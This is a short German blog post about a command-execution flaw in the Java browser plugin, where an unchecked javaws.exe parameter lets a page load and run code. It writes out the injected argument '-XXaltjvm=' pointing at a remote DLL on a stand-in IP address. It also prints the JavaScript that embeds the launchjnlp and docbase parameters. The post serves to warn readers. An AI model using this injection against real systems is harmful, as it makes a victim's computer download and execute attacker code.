Kritische Sicherheitslücke im Java Runtime Environment (JRE)
Wie Reverse Mode heute morgen berichtete, gibt es eine ziemlich schlimme Sicherheitslücke beim Verarbeiten von JAVA-Einbindungen durch Browser, die das Java-Plugin installiert haben — und das ist so ziemlich jeder Browser, den es gibt. Auch Chrome und Firefox sind betroffen, genauso wie die entsprechenden Linux-Versionen des JREs.
Bei der Sicherheitslücke handelt sich um eine Command Execution Vulnerability die durch unterlassenes Überprüfen der Aufrufparameter von javaws.exe entstanden ist. Wenn ein bei der Einbindung von Java-Applets angegebener Parameter in der Form vom " -XXaltjvm="\\12.34.56.78\virus.dll vorliegt, wird von dem Java Runtime Environment die Datei unter \\12.34.56.78\virus.dll heruntergeladen und ausgeführt. Ooops!
Der folgende Codeschnipsel dürfte genügend Aufschluss über die Einbindung der betroffenen Parameter docbase und launchjlnp geben.
1 2 3 4 5 6 7 8 9 10 | if (browser == 'MSIE') { document.write('<' + 'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" ' + 'width="0" height="0">' + '<' + 'PARAM name="launchjnlp" value="' + jnlp + '"' + '>' + '<' + 'PARAM name="docbase" value="' + jnlpDocbase + '"' + '>' + '<' + '/' + 'object' + '>'); } else if (browser == 'Netscape Family') { document.write('<' + 'embed type="application/x-java-applet;jpi-version=' + deployJava.firefoxJavaVersion + '" ' + 'width="0" height="0" ' + 'launchjnlp="' + jnlp + '"' + 'docbase="' + jnlpDocbase + '"' + ' />'); } |
Bis zu einem Schließen dieser Sicherheitslücke sollte jeder im Browser Java ausstellen.
